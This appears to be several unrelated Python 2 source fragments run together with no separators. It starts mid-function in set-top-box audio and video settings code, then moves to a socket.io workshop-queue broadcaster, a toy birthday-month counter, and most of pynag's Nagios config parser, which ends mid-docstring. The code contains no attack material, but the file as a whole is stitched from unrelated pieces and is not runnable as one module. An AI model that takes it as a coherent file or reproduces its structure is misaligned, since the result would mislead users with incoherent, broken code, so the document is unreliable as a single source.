	SystemInfo["CanDownmixAC3"] = can_downmix
	if can_downmix:
		def setAC3Downmix(configElement):
			open("/proc/stb/audio/ac3", "w").write(configElement.value and "downmix" or "passthrough")
		config.av.downmix_ac3 = ConfigYesNo(default = True)
		config.av.downmix_ac3.addNotifier(setAC3Downmix)

	try:
		can_downmix_aac = open("/proc/stb/audio/aac_choices", "r").read()[:-1].find("downmix") != -1
	except:
		can_downmix_aac = False

	SystemInfo["CanDownmixAAC"] = can_downmix_aac
	if can_downmix_aac:
		def setAACDownmix(configElement):
			open("/proc/stb/audio/aac", "w").write(configElement.value and "downmix" or "passthrough")
		config.av.downmix_aac = ConfigYesNo(default = True)
		config.av.downmix_aac.addNotifier(setAACDownmix)

	try:
		can_osd_alpha = open("/proc/stb/video/alpha", "r") and True or False
	except:
		can_osd_alpha = False

	SystemInfo["CanChangeOsdAlpha"] = can_osd_alpha

	def setAlpha(config):
		open("/proc/stb/video/alpha", "w").write(str(config.value))

	if can_osd_alpha:
		config.av.osd_alpha = ConfigSlider(default=255, limits=(0,255))
		config.av.osd_alpha.addNotifier(setAlpha)

	if os_path.exists("/proc/stb/vmpeg/0/pep_scaler_sharpness"):
		def setScaler_sharpness(config):
			myval = int(config.value)
			try:
				print "--> setting scaler_sharpness to: %0.8X" % myval
				open("/proc/stb/vmpeg/0/pep_scaler_sharpness", "w").write("%0.8X" % myval)
				open("/proc/stb/vmpeg/0/pep_apply", "w").write("1")
			except IOError:
				print "couldn't write pep_scaler_sharpness"

		config.av.scaler_sharpness = ConfigSlider(default=13, limits=(0,26))
		config.av.scaler_sharpness.addNotifier(setScaler_sharpness)
	else:
		config.av.scaler_sharpness = NoSave(ConfigNothing())


import sys
import time
import logging

from socketio import socketio_manage
from socketio.mixins import BroadcastMixin
from socketio.namespace import BaseNamespace

from DataAggregation.webdata_aggregator import getAvailableWorkshops


logger = logging.getLogger(__name__)
std_out_logger = logging.StreamHandler(sys.stdout)
logger.addHandler(std_out_logger)


def broadcast_msg(server, ns_name, event, *args):
    pkt = dict(type="event",
               name=event,
               args=args,
               endpoint=ns_name)

    for sessid, socket in server.sockets.iteritems():
        socket.send_packet(pkt)


def workshops_monitor(server):
    sizes = []
    workshops = getAvailableWorkshops()
    for w in workshops:
        tmp = [w.workshopName, w.q.qsize()]
        sizes.append(tmp)
        broadcast_msg(server, '', "sizes", tmp)

    while True:
        logger.info("Participants viewing frontend:" + str(len(server.sockets)))
        workshops_available = []
        curr_workshops = getAvailableWorkshops()
        for w in curr_workshops:
            workshops_available.append([w.workshopName, w.q.qsize()])
            wq = filter(lambda x: x[0] == w.workshopName, sizes)[0]
            if wq[1] != w.q.qsize():
                wq[1] = w.q.qsize()
                logging.info("client_updater: New update being pushed to clients: " + str(wq))
                broadcast_msg(server, '', 'sizes', wq)
        logger.info("Workshops available:" + str(workshops_available))
        time.sleep(1)


class RequestHandlerApp(object):
    def __call__(self, environ, start_response):
        if environ['PATH_INFO'].startswith('/socket.io'):
            socketio_manage(environ, {'': QueueStatusHandler})


class QueueStatusHandler(BaseNamespace, BroadcastMixin):
    def on_connect(self):
        sizes = []
        workshops = getAvailableWorkshops()
        for w in workshops:
            tmp = [w.workshopName, w.q.qsize()]
            sizes.append(tmp)
            self.emit('sizes', tmp)

def freq_month(obj):
    if obj is None or obj == []:
        return
    months = {1: 'jan',
              2: 'feb',
              3: 'mar',
              4: 'apr',
              5: 'may',
              6: 'jun',
              7: 'jul',
              8: 'aug',
              9: 'sep',
              10: 'oct',
              11: 'nov',
              12: 'dec',
             }
    frequencies = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]

#    for i in range(0, len(obj)):
#        frequencies[ obj[i] -1] += 1

    for i in obj:
        frequencies[ i-1 ] += 1

    print "The following month(s) have a birthday celebration"
    for i in range(0, len(frequencies)):
        if frequencies[i] > 0:
            print str(months[i+1]) + " has " + str(frequencies[i])
    return frequencies

in_array = [3,6,2,7,7,7,]
print freq_month(in_array)
print freq_month([])

# -*- coding: utf-8 -*-
#
# pynag - Python Nagios plug-in and configuration environment
# Copyright (C) 2010 Drew Stinnet
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

"""This module contains low-level Parsers for nagios configuration and status objects.

Hint: If you are looking to parse some nagios configuration data, you probably
want pynag.Model module instead.

The highlights of this module are:

class Config: For Parsing nagios local nagios configuration files
class Livestatus: To connect to MK-Livestatus
class StatusDat: To read info from status.dat (not used a lot, migrate to mk-livestatus)
class LogFiles: To read nagios log-files
class MultiSite: To talk with multiple Livestatus instances
"""
import os
import re
import time
import sys
import socket  # for mk_livestatus
import stat

import pynag.Plugins
import pynag.Utils
import StringIO
import tarfile

_sentinel = object()


class Config(object):

    """ Parse and write nagios config files """
    # Regex for beginning of object definition
    # We want everything that matches:
    # define <object_type> {
    __beginning_of_object = re.compile("^\s*define\s+(\w+)\s*\{?(.*)$")

    def __init__(self, cfg_file=None, strict=False):
        """ Constructor for :py:class:`pynag.Parsers.config` class

        Args:

            cfg_file (str): Full path to nagios.cfg. If None, try to
            auto-discover location

            strict (bool): if True, use stricter parsing which is more prone to
            raising exceptions
        """

        self.cfg_file = cfg_file  # Main configuration file
        self.strict = strict  # Use strict parsing or not

        # If nagios.cfg is not set, lets do some minor autodiscover.
        if self.cfg_file is None:
            self.cfg_file = self.guess_cfg_file()

        self.data = {}
        self.maincfg_values = []
        self._is_dirty = False
        self.reset()  # Initilize misc member variables

    def guess_nagios_directory(self):
        """ Returns a path to the nagios configuration directory on your system

        Use this function for determining the nagios config directory in your
        code

        Returns:

            str. directory containing the nagios.cfg file

        Raises:

            :py:class:`pynag.Parsers.ConfigFileNotFound` if cannot guess config
            file location.
        """
        cfg_file = self.guess_cfg_file()
        if not cfg_file:
            raise ConfigFileNotFound("Could not find nagios.cfg")
        return os.path.dirname(cfg_file)

    def guess_nagios_binary(self):
        """ Returns a path to any nagios binary found on your system

        Use this function if you don't want specify path to the nagios binary
        in your code and you are confident that it is located in a common
        location

        Checked locations are as follows:

        * /usr/bin/nagios
        * /usr/sbin/nagios
        * /usr/local/nagios/bin/nagios
        * /nagios/bin/nagios
        * /usr/bin/icinga
        * /usr/sbin/icinga
        * /usr/bin/naemon
        * /usr/sbin/naemon
        * /usr/local/naemon/bin/naemon.cfg
        * /usr/bin/shinken
        * /usr/sbin/shinken

        Returns:

            str. Path to the nagios binary

            None if could not find a binary in any of those locations
        """

        possible_files = ('/usr/bin/nagios',
                          '/usr/sbin/nagios',
                          '/usr/local/nagios/bin/nagios',
                          '/nagios/bin/nagios',
                          '/usr/bin/icinga',
                          '/usr/sbin/icinga',
                          '/usr/bin/naemon',
                          '/usr/sbin/naemon',
                          '/usr/local/naemon/bin/naemon.cfg',
                          '/usr/bin/shinken',
                          '/usr/sbin/shinken')

        possible_binaries = ('nagios', 'nagios3', 'naemon', 'icinga', 'shinken')
        for i in possible_binaries:
            command = ['which', i]
            code, stdout, stderr = pynag.Utils.runCommand(command=command, shell=False)
            if code == 0:
                return stdout.splitlines()[0].strip()

        return None

    def guess_cfg_file(self):
        """ Returns a path to any nagios.cfg found on your system

        Use this function if you don't want specify path to nagios.cfg in your
        code and you are confident that it is located in a common location

        Checked locations are as follows:

        * /etc/nagios/nagios.cfg
        * /etc/nagios3/nagios.cfg
        * /usr/local/nagios/etc/nagios.cfg
        * /nagios/etc/nagios/nagios.cfg
        * ./nagios.cfg
        * ./nagios/nagios.cfg
        * /etc/icinga/icinga.cfg
        * /usr/local/icinga/etc/icinga.cfg
        * ./icinga.cfg
        * ./icinga/icinga.cfg
        * /etc/naemon/naemon.cfg
        * /usr/local/naemon/etc/naemon.cfg
        * ./naemon.cfg
        * ./naemon/naemon.cfg
        * /etc/shinken/shinken.cfg

        Returns:

            str. Path to the nagios.cfg or equivalent file

            None if couldn't find a file in any of these locations.
        """

        possible_files = ('/etc/nagios/nagios.cfg',
                          '/etc/nagios3/nagios.cfg',
                          '/usr/local/nagios/etc/nagios.cfg',
                          '/nagios/etc/nagios/nagios.cfg',
                          './nagios.cfg',
                          './nagios/nagios.cfg',
                          '/etc/icinga/icinga.cfg',
                          '/usr/local/icinga/etc/icinga.cfg',
                          './icinga.cfg',
                          './icinga/icinga.cfg',
                          '/etc/naemon/naemon.cfg',
                          '/usr/local/naemon/etc/naemon.cfg',
                          './naemon.cfg',
                          './naemon/naemon.cfg',
                          '/etc/shinken/shinken.cfg',
                          )

        for file_path in possible_files:
            if self.isfile(file_path):
                return file_path
        return None

    def reset(self):
        """ Reinitializes the data of a parser instance to its default values.
        """

        self.cfg_files = []  # List of other configuration files
        self.data = {}  # dict of every known object definition
        self.errors = []  # List of ParserErrors
        self.item_list = None
        self.item_cache = None
        self.maincfg_values = []  # The contents of main nagios.cfg
        self._resource_values = []  # The contents of any resource_files
        self.item_apply_cache = {}  # This is performance tweak used by _apply_template

        # This is a pure listof all the key/values in the config files.  It
        # shouldn't be useful until the items in it are parsed through with the proper
        # 'use' relationships
        self.pre_object_list = []
        self.post_object_list = []
        self.object_type_keys = {
            'hostgroup': 'hostgroup_name',
            'hostextinfo': 'host_name',
            'host': 'host_name',
            'service': 'name',
            'servicegroup': 'servicegroup_name',
            'contact': 'contact_name',
            'contactgroup': 'contactgroup_name',
            'timeperiod': 'timeperiod_name',
            'command': 'command_name',
            #'service':['host_name','description'],
        }

    def _has_template(self, target):
        """ Determine if an item has a template associated with it

        Args:
            target (dict): Parsed item as parsed by :py:class:`pynag.Parsers.config`
        """
        return 'use' in target

    def _get_pid(self):
        """ Checks the lock_file var in nagios.cfg and returns the pid from the file

        If the pid file does not exist, returns None.
        """
        try:
            return self.open(self.get_cfg_value('lock_file'), "r").readline().strip()
        except Exception:
            return None

    def _get_hostgroup(self, hostgroup_name):
        """ Returns the hostgroup that matches the queried name.

        Args:
            hostgroup_name: Name of the hostgroup to be returned (string)

        Returns:
            Hostgroup item with hostgroup_name that matches the queried name.
        """

        return self.data['all_hostgroup'].get(hostgroup_name, None)

    def _get_key(self, object_type, user_key=None):
        """ Return the correct 'key' for an item.

        This is mainly a helper method for other methods in this class. It is
        used to shorten code repetition.

        Args:

            object_type: Object type from which to obtain the 'key' (string)

            user_key: User defined key. Default None. (string)

        Returns:
            Correct 'key' for the object type. (string)
        """

        if not user_key and not object_type in self.object_type_keys:
            raise ParserError("Unknown key for object type:  %s\n" % object_type)

        # Use a default key
        if not user_key:
            user_key = self.object_type_keys[object_type]

        return user_key

    def _get_item(self, item_name, item_type):
        """ Return an item from a list

        Creates a cache of items in self.pre_object_list and returns an element
        from this cache. Looks for an item with corresponding name and type.

        Args:

            item_name: Name of the item to be returned (string)

            item_type: Type of the item to be returned (string)

        Returns:

            Item with matching name and type from
            :py:attr:`pynag.Parsers.config.item_cache`
        """
        # create local cache for performance optimizations. TODO: Rewrite functions that call this function
        if not self.item_list:
            self.item_list = self.pre_object_list
            self.item_cache = {}
            for item in self.item_list:
                if not "name" in item:
                    continue
                name = item['name']
                tmp_item_type = (item['meta']['object_type'])
                if not tmp_item_type in self.item_cache:
                    self.item_cache[tmp_item_type] = {}
                self.item_cache[tmp_item_type][name] = item
        my_cache = self.item_cache.get(item_type, None)
        if not my_cache:
            return None
        return my_cache.get(item_name, None)

    def _apply_template(self, original_item):
        """ Apply all attributes of item named parent_name to "original_item".

        Applies all of the attributes of parents (from the 'use' field) to item.

        Args:

            original_item: Item 'use'-ing a parent item. The parent's attributes
            will be concretely added to this item.

        Returns:

            original_item to which have been added all the attributes defined
            in parent items.
        """

        # TODO: There is space for more performance tweaks here
        # If item does not inherit from anyone else, lets just return item as is.
        if 'use' not in original_item:
            return original_item
        object_type = original_item['meta']['object_type']
        raw_definition = original_item['meta']['raw_definition']
        my_cache = self.item_apply_cache.get(object_type, {})

        # Performance tweak, if item has been parsed. Lets not do it again
        if raw_definition in my_cache:
            return my_cache[raw_definition]

        parent_names = original_item['use'].split(',')
        parent_items = []
        for parent_name in parent_names:
            parent_item = self._get_item(parent_name, object_type)
            if parent_item is None:
                error_string = "Can not find any %s named %s\n" % (object_type, parent_name)
                self.errors.append(ParserError(error_string, item=original_item))
                continue

            try:
                # Parent item probably has use flags on its own. So lets apply to parent first
                parent_item = self._apply_template(parent_item)
            except RuntimeError:
                t, e = sys.exc_info()[:2]
                self.errors.append(ParserError("Error while parsing item: %s (it might have circular use=)" % str(e),
                                               item=original_item))
            parent_items.append(parent_item)

        inherited_attributes = original_item['meta']['inherited_attributes']
        template_fields = original_item['meta']['template_fields']
        for parent_item in parent_items:
            for k, v in parent_item.iteritems():
                if k in ('use', 'register', 'meta', 'name'):
                    continue
                if k not in inherited_attributes:
                    inherited_attributes[k] = v
                if k not in original_item:
                    original_item[k] = v
                    template_fields.append(k)
        if 'name' in original_item:
            my_cache[raw_definition] = original_item

        return original_item

    def _get_items_in_file(self, filename):
        """ Return all items in the given file

        Iterates through all elements in self.data and gatehrs all the items
        defined in the queried filename.

        Args:

            filename: file from which are defined the items that will be
            returned.

        Returns:

            A list containing all the items in self.data that were defined in
            filename
        """
        return_list = []

        for k in self.data.keys():
            for item in self[k]:
                if item['meta']['filename'] == filename:
                    return_list.append(item)
        return return_list

    def get_new_item(self, object_type, filename):
        """ Returns an empty item with all necessary metadata

        Creates a new item dict and fills it with usual metadata:

            * object_type : object_type (arg)
            * filename : filename (arg)
            * template_fields = []
            * needs_commit = None
            * delete_me = None
            * defined_attributes = {}
            * inherited_attributes = {}
            * raw_definition = "define %s {\\n\\n} % object_type"

        Args:

            object_type: type of the object to be created (string)

            filename: Path to which the item will be saved (string)

        Returns:

            A new item with default metadata

        """

        meta = {
            'object_type': object_type,
            'filename': filename,
            'template_fields': [],
            'needs_commit': None,
            'delete_me': None,
            'defined_attributes': {},
            'inherited_attributes': {},
            'raw_definition': "define %s {\n\n}" % object_type,
        }
        return {'meta': meta}

    def _load_file(self, filename):
        """ Parses filename with self.parse_filename and append results in self._pre_object_list

        This function is mostly here for backwards compatibility

        Args:

            filename: the file to be parsed. This is supposed to a nagios object definition file
        """
        for i in self.parse_file(filename):
            self.pre_object_list.append(i)

    def parse_file(self, filename):
        """ Parses a nagios object configuration file and returns lists of dictionaries.

        This is more or less a wrapper around :py:meth:`config.parse_string`,
        so reading documentation there is useful.

        Args:

            filename: Path to the file to parse (string)

        Returns:

            A list containing elements parsed by :py:meth:`parse_string`
        """
        try:
            raw_string = self.open(filename, 'rb').read()
            return self.parse_string(raw_string, filename=filename)
        except IOError:
            t, e = sys.exc_info()[:2]
            parser_error = ParserError(e.strerror)
            parser_error.filename = e.filename
            self.errors.append(parser_error)
            return []

    def parse_string(self, string, filename='None'):
        """ Parses a string, and returns all object definitions in that string

        Args:

            string: A string containing one or more object definitions

            filename (optional): If filename is provided, it will be referenced
            when raising exceptions

        Examples:

            >>> test_string = "define host {\\nhost_name examplehost\\n}\\n"
            >>> test_string += "define service {\\nhost_name examplehost\\nservice_description example service\\n}\\n"
            >>> c = config()
            >>> result = c.parse_string(test_string)
            >>> for i in result: print i.get('host_name'), i.get('service_description', None)
            examplehost None
            examplehost example service

        Returns:

            A list of dictionaries, that look like self.data

        Raises:

            :py:class:`ParserError`

        """
        append = ""
        current = None
        in_definition = {}
        tmp_buffer = []
        result = []

        for sequence_no, line in enumerate(string.splitlines(False)):
            line_num = sequence_no + 1

            # If previous line ended with backslash, treat this line as a
            # continuation of previous line
            if append:
                line = append + line
                append = None

            # Cleanup and line skips
            line = line.strip()
            if line == "":
                continue
            if line[0] == "#" or line[0] == ';':
                continue

            # If this line ends with a backslash, continue directly to next line
            if line.endswith('\\'):
                append = line.strip('\\')
                continue

            if line.startswith('}'):  # end of object definition

                if not in_definition:
                    p = ParserError("Unexpected '}' found outside object definition in line %s" % line_num)
                    p.filename = filename
                    p.line_start = line_num
                    raise p

                in_definition = None
                current['meta']['line_end'] = line_num
                # Looks to me like nagios ignores everything after the } so why shouldn't we ?
                rest = line.split("}", 1)[1]

                tmp_buffer.append(line)
                try:
                    current['meta']['raw_definition'] = '\n'.join(tmp_buffer)
                except Exception:
                    raise ParserError("Encountered Unexpected end of object definition in file '%s'." % filename)
                result.append(current)

                # Destroy the Nagios Object
                current = None
                continue

            elif line.startswith('define'):  # beginning of object definition
                if in_definition:
                    msg = "Unexpected 'define' in {filename} on line {line_num}. was expecting '}}'."
                    msg = msg.format(**locals())
                    self.errors.append(ParserError(msg, item=current))

                m = self.__beginning_of_object.search(line)

                tmp_buffer = [line]
                object_type = m.groups()[0]
                if self.strict and object_type not in self.object_type_keys.keys():
                    raise ParserError(
                        "Don't know any object definition of type '%s'. it is not in a list of known object definitions." % object_type)
                current = self.get_new_item(object_type, filename)
                current['meta']['line_start'] = line_num

                # Start off an object
                in_definition = True

                # Looks to me like nagios ignores everything after the {, so why shouldn't we ?
                rest = m.groups()[1]
                continue
            else:  # In the middle of an object definition
                tmp_buffer.append('    ' + line)

            # save whatever's left in the buffer for the next iteration
            if not in_definition:
                append = line
                continue

            # this is an attribute inside an object definition
            if in_definition:
                #(key, value) = line.split(None, 1)
                tmp = line.split(None, 1)
                if len(tmp) > 1:
                    (key, value) = tmp
                else:
                    key = tmp[0]
                    value = ""

                # Strip out in-line comments
                if value.find(";") != -1:
                    value = value.split(";", 1)[0]

                # Clean info
                key = key.strip()
                value = value.strip()

                # Rename some old values that may be in the configuration
                # This can probably be removed in the future to increase performance
                if (current['meta']['object_type'] == 'service') and key == 'description':
                    key = 'service_description'

                # Special hack for timeperiods as they are not consistent with other objects
                # We will treat whole line as a key with an empty value
                if (current['meta']['object_type'] == 'timeperiod') and key not in ('timeperiod_name', 'alias'):
                    key = line
                    value = ''
                current[key] = value
                current['meta']['defined_attributes'][key] = value
            # Something is wrong in the config
            else:
                raise ParserError("Error: Unexpected token in file '%s'" % filename)

        # Something is wrong in the config
        if in_definition:
            raise ParserError("Error: Unexpected EOF in file '%s'" % filename)

        return result

    def _locate_item(self, item):
        """ This is a helper function for anyone who wishes to modify objects.

        It takes "item", locates the file which is configured in, and locates
        exactly the lines which contain that definition.

        Returns: (tuple)

            (everything_before, object_definition, everything_after, filename):

                * everything_before (list of lines): Every line in filename before object was defined
                * everything_after (list of lines): Every line in "filename" after object was defined
                * object_definition (list of lines): Every line used to define our item in "filename"
                * filename (string): file in which the object was written to

        Raises:

            :py:class:`ValueError` if object was not found in "filename"

        """
        if "filename" in item['meta']:
            filename = item['meta']['filename']
        else:
            raise ValueError("item does not have a filename")

        # Look for our item, store it as my_item
        for i in self.parse_file(filename):
            if self.compareObjects(item, i):
                my_item = i
                break
        else:
            raise ValueError("We could not find object in %s\n%s" % (filename, item))

        # Caller of this method expects to be returned
        # several lists that describe the lines in our file.
        # The splitting logic starts here.
        my_file = self.open(filename)
        all_lines = my_file.readlines()
        my_file.close()

        start = my_item['meta']['line_start'] - 1
        end = my_item['meta']['line_end']
        everything_before = all_lines[:start]
        object_definition = all_lines[start:end]
        everything_after = all_lines[end:]

        # If there happen to be line continuations in the object we will edit
        # We will remove them from object_definition
        object_definition = self._clean_backslashes(object_definition)
        return everything_before, object_definition, everything_after, filename

    def _clean_backslashes(self, list_of_strings):
        """ Returns list_of_strings with all all strings joined that ended with backslashes

            Args:
                list_of_strings: List of strings to join
            Returns:
                Another list of strings, which lines ending with \ joined together.

        """
        tmp_buffer = ''
        result = []
        for i in list_of_strings:
            if i.endswith('\\\n'):
                tmp_buffer += i.strip('\\\n')
            else:
                result.append(tmp_buffer + i)
                tmp_buffer = ''
        return result

    def _modify_object(self, item, field_name=None, new_value=None, new_field_name=None, new_item=None,
                       make_comments=False):
        """ Locates "item" and changes the line which contains field_name.

        Helper function for object_* functions. Locates "item" and changes the
        line which contains field_name. If new_value and new_field_name are both
        None, the attribute is removed.

        Args:

            item(dict): The item to be modified

            field_name(str): The field_name to modify (if any)

            new_field_name(str): If set, field_name will be renamed

            new_value(str): If set the value of field_name will be changed

            new_item(str): If set, whole object will be replaced with this
            string

            make_comments: If set, put pynag-branded comments where changes
            have been made

        Returns:

            True on success

        Raises:

            :py:class:`ValueError` if object or field_name is not found

            :py:class:`IOError` is save is unsuccessful.

        """
        if item is None:
            return
        if field_name is None and new_item is None:
            raise ValueError("either field_name or new_item must be set")
        if '\n' in str(new_value):
            raise ValueError("Invalid character \\n used as an attribute value.")
        everything_before, object_definition, everything_after, filename = self._locate_item(item)
        if new_item is not None:
            # We have instruction on how to write new object, so we dont need to parse it
            object_definition = [new_item]
        else:
            change = None
            value = None
            i = 0
            for i in range(len(object_definition)):
                tmp = object_definition[i].split(None, 1)
                if len(tmp) == 0:
                    continue
                # Hack for timeperiods, they dont work like other objects
                elif item['meta']['object_type'] == 'timeperiod' and field_name not in ('alias', 'timeperiod_name'):
                    tmp = [object_definition[i]]
                    # we can't change timeperiod, so we fake a field rename
                    if new_value is not None:
                        new_field_name = new_value
                        new_value = None
                        value = ''
                elif len(tmp) == 1:
                    value = ''
                else:
                    value = tmp[1]
                k = tmp[0].strip()
                if k == field_name:
                    # Attribute was found, lets change this line
                    if new_field_name is None and new_value is None:
                        # We take it that we are supposed to remove this attribute
                        change = object_definition.pop(i)
                        break
                    elif new_field_name:
                        # Field name has changed
                        k = new_field_name
                    if new_value is not None:
                        # value has changed
                        value = new_value
                        # Here we do the actual change
                    change = "\t%-30s%s\n" % (k, value)
                    if item['meta']['object_type'] == 'timeperiod' and field_name not in ('alias', 'timeperiod_name'):
                        change = "\t%s\n" % new_field_name
                    object_definition[i] = change
                    break
            if not change and new_value is not None:
                # Attribute was not found. Lets add it
                change = "\t%-30s%s\n" % (field_name, new_value)
                object_definition.insert(i, change)
            # Lets put a banner in front of our item
        if make_comments:
            comment = '# Edited by PyNag on %s\n' % time.ctime()
            if len(everything_before) > 0:
                last_line_before = everything_before[-1]
                if last_line_before.startswith('# Edited by PyNag on'):
                    everything_before.pop()  # remove this line
            object_definition.insert(0, comment)
            # Here we overwrite the config-file, hoping not to ruin anything
        str_buffer = "%s%s%s" % (''.join(everything_before), ''.join(object_definition), ''.join(everything_after))
        self.write(filename, str_buffer)
        return True

    def open(self, filename, *args, **kwargs):
        """ Wrapper around global open()

        Simply calls global open(filename, *args, **kwargs) and passes all arguments
        as they are received. See global open() function for more details.
        """
        return open(filename, *args, **kwargs)

    @pynag.Utils.synchronized(pynag.Utils.rlock)
    def write(self, filename, string):
        """ Wrapper around open(filename).write()

        Writes string to filename and closes the file handler. File handler is
        openned in `'w'` mode.

        Args:

            filename: File where *string* will be written. This is the path to
            the file. (string)

            string: String to be written to file. (string)

        Returns:

            Return code as returned by :py:meth:`os.write`

        """
        fh = self.open(filename, 'w')
        return_code = fh.write(string)
        fh.flush()
        # os.fsync(fh)
        fh.close()
        self._is_dirty = True
        return return_code

    def item_rewrite(self, item, str_new_item):
        """ Completely rewrites item with string provided.

        Args:

            item: Item that is to be rewritten

            str_new_item: str representation of the new item

        ..
            In the following line, every "\\n" is actually a simple line break
            This is only a little patch for the generated documentation.

        Examples::
            item_rewrite( item, "define service {\\n name example-service \\n register 0 \\n }\\n" )

        Returns:

            True on success

        Raises:

            :py:class:`ValueError` if object is not found

            :py:class:`IOError` if save fails
        """
        return self._modify_object(item=item, new_item=str_new_item)

    def item_remove(self, item):
        """ Delete one specific item from its configuration files

        Args:

            item: Item that is to be rewritten

            str_new_item: string representation of the new item

        ..
            In the following line, every "\\n" is actually a simple line break
            This is only a little patch for the generated documentation.

        Examples::
            item_remove( item, "define service {\\n name example-service \\n register 0 \\n }\\n" )

        Returns:

            True on success

        Raises:

            :py:class:`ValueError` if object is not found

            :py:class:`IOError` if save fails
        """
        return self._modify_object(item=item, new_item="")

    def item_edit_field(self, item, field_name, new_value):
        """ Modifies one field of a (currently existing) object.

        Changes are immediate (i.e. there is no commit)

        Args:

            item: Item to be modified. Its field `field_name` will be set to
            `new_value`.

            field_name: Name of the field that will be modified. (str)

            new_value: Value to which will be set the field `field_name`. (str)

        Example usage::
            edit_object( item, field_name="host_name", new_value="examplehost.example.com") # doctest: +SKIP

        Returns:
            True on success

        Raises:

            :py:class:`ValueError` if object is not found

            :py:class:`IOError` if save fails
        """
        return self._modify_object(item, field_name=field_name, new_value=new_value)

    def item_remove_field(self, item, field_name):
        """ Removes one field of a (currently existing) object.

        Changes are immediate (i.e. there is no commit)

        Args:

            item: Item to remove field from.

            field_name: Field to remove. (string)

        Example usage::
            item_remove_field( item, field_name="contactgroups" )

        Returns:
            True on success

        Raises:

            :py:class:`ValueError` if object is not found

            :py:class:`IOError` if save fails
        """
        return self._modify_object(item=item, field_name=field_name, new_value=None, new_field_name=None)

    def item_rename_field(self, item, old_field_name, new_field_name):
        """ Renames a field of a (currently existing) item.

        Changes are immediate (i.e. there is no commit).

        Args:

            item: Item to modify.

            old_field_name: Name of the field that will have its name changed. (string)

            new_field_name: New name given to `old_field_name` (string)

        Example usage::
            item_rename_field(item, old_field_name="normal_check_interval", new_field_name="check_interval")

        Returns:
            True on success

        Raises:

            :py:class:`ValueError` if object is not found

            :py:class:`IOError` if save fails
        """
        return self._modify_object(item=item, field_name=old_field_name, new_field_name=new_field_name)

    def item_add(self, item, filename):
        """ Adds a new object to a specified config file.

        Args:

            item: Item to be created

            filename: Filename that we are supposed to write the new item to.
            This is the path to the file. (string)

        Returns:

            True on success

        Raises:

            :py:class:`IOError` on failed save
        """
        if not 'meta' in item:
            item['meta'] = {}
        item['meta']['filename'] = filename

        # Create directory if it does not already exist
        dirname = os.path.dirname(filename)
        if not self.isdir(dirname):
            os.makedirs(dirname)

        str_buffer = self.print_conf(item)
        fh = self.open(filename, 'a')
        fh.write(str_buffer)
        fh.close()
        return True

    def edit_object(self, item, field_name, new_value):
        """ Modifies a (currently existing) item.

        Changes are immediate (i.e. there is no commit)

        Args:

            item: Item to modify.

            field_name: Field that will be updated.

            new_value: Updated value of field `field_name`

        Example Usage:
            edit_object( item, field_name="host_name", new_value="examplehost.example.com")

        Returns:
            True on success

        .. WARNING::

            THIS FUNCTION IS DEPRECATED. USE item_edit_field() instead
        """
        return self.item_edit_field(item=item, field_name=field_name, new_value=new_value)

    def compareObjects(self, item1, item2):
        """ Compares two items. Returns true if they are equal

        Compares every key: value pair for both items. If anything is different,
        the items will not be considered equal.

        Args:
            item1, item2: Items to be compared.

        Returns:

            True -- Items are equal

            False -- Items are not equal
        """
        keys1 = item1['meta']['defined_attributes'].keys()
        keys2 = item2['meta']['defined_attributes'].keys()
        keys1.sort()
        keys2.sort()
        result = True
        if keys1 != keys2:
            return False
        for key in keys1:
            if key == 'meta':
                continue
            key1 = item1[key]
            key2 = item2[key]
            # For our purpose, 30 is equal to 30.000
            if key == 'check_interval':
                key1 = int(float(key1))
                key2 = int(float(key2))
            if str(key1) != str(key2):
                result = False
        if result is False:
            return False
        return True

    def edit_service(self, target_host, service_description, field_name, new_value):
        """ Edit a service's attributes

        Takes a host, service_description pair to identify the service to modify
        and sets its field `field_name` to `new_value`.

        Args:

            target_host: name of the host to which the service is attached to. (string)

            service_description: Service description of the service to modify. (string)

            field_name: Field to modify. (string)

            new_value: Value to which the `field_name` field will be updated (string)

        Returns:

            True on success

        Raises:

            :py:class:`ParserError` if the service is not found
        """

        original_object = self.get_service(target_host, service_description)
        if original_object is None:
            raise ParserError("Service not found")
        return self.edit_object(original_object, field_name, new_value)

    def _get_list(self, item, key):
        """ Return a comma list from an item

        Args:

            item: Item from which to select value. (string)

            key: Field name of the value to select and return as a list. (string)

        Example::

            _get_list(Foo_object, host_name)

            define service {
                service_description Foo
                host_name            larry,curly,moe
            }

            returns
            ['larry','curly','moe']

        Returns:

            A list of the item's values of `key`

        Raises:

            :py:class:`ParserError` if item is not a dict
        """
        if not isinstance(item, dict):
            raise ParserError("%s is not a dictionary\n" % item)
            # return []
        if not key in item:
            return []

        return_list = []

        if item[key].find(",") != -1:
            for name in item[key].split(","):
                return_list.append(name)
        else:
            return_list.append(item[key])

        # Alphabetize
        return_list.sort()

        return return_list

    def delete_object(self, object_type, object_name, user_key=None):
        """ Delete object from configuration files

        Args:

            object_type: Type of the object to delete from configuration files.

            object_name: Name of the object to delete from configuration files.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            True on success.

        """
        item = self.get_object(object_type=object_type, object_name=object_name, user_key=user_key)
        return self.item_remove(item)

    def delete_service(self, service_description, host_name):
        """ Delete service from configuration files

        Args:

            service_description: service_description field value of the object
            to delete from configuration files.

            host_name: host_name field value of the object to delete from
            configuration files.

        Returns:

            True on success.

        """
        item = self.get_service(host_name, service_description)
        return self.item_remove(item)

    def delete_host(self, object_name, user_key=None):
        """ Delete a host from its configuration files

        Args:

            object_name: object_name field value of the object to delete from
            configuration files.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            True on success.

        """

        return self.delete_object('host', object_name, user_key=user_key)

    def delete_hostgroup(self, object_name, user_key=None):
        """ Delete a hostgroup from its configuration files

        Args:

            object_name: object_name field value of the object to delete from
            configuration files.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            True on success.

        """
        return self.delete_object('hostgroup', object_name, user_key=user_key)

    def get_object(self, object_type, object_name, user_key=None):
        """ Return a complete object dictionary

        Args:

            object_name: object_name field value of the object to delete from
            configuration files.

            user_key: User defined key. Default None. (string)

        Returns:

            The item found to match all the criterias.

